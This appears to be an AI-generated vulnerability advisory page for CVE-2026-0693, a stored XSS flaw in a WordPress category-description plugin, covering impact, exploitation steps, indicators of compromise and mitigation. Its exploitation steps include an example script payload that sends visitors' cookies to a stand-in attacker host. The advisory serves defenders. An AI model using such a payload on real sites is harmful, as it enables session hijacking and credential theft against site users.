CVE-2026-0693: 
WordPress vulnerability analysis and mitigation

Overview

CVE-2026-0693 is a Stored Cross-Site Scripting (XSS) vulnerability in the "Allow HTML in Category Descriptions" plugin for WordPress, affecting all versions up to and including 1.2.4. The plugin unconditionally removes the wp_kses_data output filter for term_description, link_description, link_notes, and user_description fields without verifying user capabilities, allowing authenticated attackers with administrator-level access to inject arbitrary web scripts into category descriptions. The vulnerability is only exploitable on multi-site WordPress installations or installations where unfiltered_html has been disabled. It was published on February 14, 2026, and carries a CVSS v3.1 base score of 4.4 (Medium) (Red Hat CVE).

Technical details

The root cause is classified as CWE-79 (Improper Neutralization of Input During Web Page Generation — Cross-Site Scripting). The plugin removes the wp_kses_data filter from WordPress output hooks (term_description, link_description, link_notes, user_description) unconditionally, bypassing WordPress's built-in HTML sanitization for these fields regardless of whether the current user has the unfiltered_html capability. An authenticated attacker with administrator-level privileges can craft a malicious category description containing JavaScript payloads; these scripts are stored in the database and execute in the browser of any user who visits a page rendering the affected category description. Exploitation requires high attack complexity and high privileges, and the scope is changed (affecting users beyond the attacker's session) (Red Hat CVE).

Impact

Successful exploitation allows an attacker to execute arbitrary JavaScript in the context of other users' browsers whenever they visit a page displaying the poisoned category description. This can lead to session hijacking, credential theft, unauthorized actions performed on behalf of victims, and potential privilege escalation within the WordPress environment. Confidentiality and integrity are both impacted at a low level; availability is not affected. The changed scope means the impact extends beyond the attacker's own session to other site users (Red Hat CVE).

Exploitability

No public proof-of-concept exploit code or evidence of in-the-wild exploitation has been identified for this vulnerability. The EPSS score is approximately 0.026%, indicating a very low probability of exploitation in the near term. The vulnerability requires administrator-level authentication and is further constrained to multi-site WordPress installations or those with unfiltered_html disabled, significantly limiting the attack surface. It is not currently listed in the CISA Known Exploited Vulnerabilities (KEV) catalog (Red Hat CVE).

Exploitation steps

  1. Identify target: Confirm the target WordPress site is a multi-site installation or has unfiltered_html disabled, and that the "Allow HTML in Category Descriptions" plugin version ≤ 1.2.4 is active.
  2. Authenticate: Log in to the WordPress admin panel with administrator-level credentials (or higher).
  3. Navigate to category editor: Go to Posts → Categories (or the relevant taxonomy editor) and select or create a category to edit.
  4. Inject XSS payload: In the category description field, insert a malicious JavaScript payload, e.g., <script>document.location='https://attacker.com/steal?c='+document.cookie</script>. Because the plugin removes wp_kses_data filtering, the script is stored without sanitization.
  5. Trigger execution: When any user (including lower-privileged users or visitors) navigates to a page that renders the affected category description, the injected script executes in their browser, potentially stealing session cookies or performing actions on their behalf (Red Hat CVE).

Indicators of compromise

  • Database: WordPress wp_terms or wp_term_taxonomy table entries for category descriptions containing <script>, javascript:, onerror=, onload=, or other event handler attributes.
  • Logs: WordPress admin audit logs (if enabled) showing category description edits by administrator accounts, particularly with unusual HTML content.
  • Network: Outbound requests from user browsers to unexpected external domains originating from WordPress category/archive pages (visible in web server access logs or browser developer tools).
  • File System: No direct file system artifacts expected, as the payload is stored in the database rather than on disk.

Mitigation and workarounds

WordPress site administrators should update the "Allow HTML in Category Descriptions" plugin to a version beyond 1.2.4 that addresses this vulnerability, once a patched release is available from the plugin author. As an interim workaround, administrators can deactivate or remove the plugin entirely to restore WordPress's default wp_kses_data output filtering on description fields. On multi-site networks, network administrators should audit which plugins are network-activated and restrict administrator capabilities where possible. Ensuring that only trusted users hold administrator roles reduces the risk of exploitation (Red Hat CVE).

Additional resources


Source: This report was generated using AI

Related WordPress vulnerabilities:

CVE ID

Severity

Score

Technologies

Component name

CISA KEV exploit

Has fix

Published date

CVE-2026-86850MEDIUM6.5
  • sku-error-fixer-for-woocommerce
NoNoOct 06, 2026
CVE-2026-88931MEDIUM5.3
  • social-web-suite
NoNoOct 06, 2026
CVE-2026-87841MEDIUM5.3
  • unitechpay-paiements-mobile-money
NoNoOct 06, 2026
CVE-2026-92990MEDIUM5.3
  • sendpress
NoNoOct 06, 2026
CVE-2026-92989MEDIUM4.3
  • sendpress
NoNoOct 06, 2026

Free Vulnerability Assessment

Benchmark your Cloud Security Posture

Evaluate your cloud security practices across 9 security domains to benchmark your risk level and identify gaps in your defenses.

Request assessment

Get a personalized demo

Ready to see Wiz in action?

"Best User Experience I have ever seen, provides full visibility to cloud workloads."
David EstlickCISO
"Wiz provides a single pane of glass to see what is going on in our cloud environments."
Adam FletcherChief Security Officer
"We know that if Wiz identifies something as critical, it actually is."
Greg PoniatowskiHead of Threat and Vulnerability Management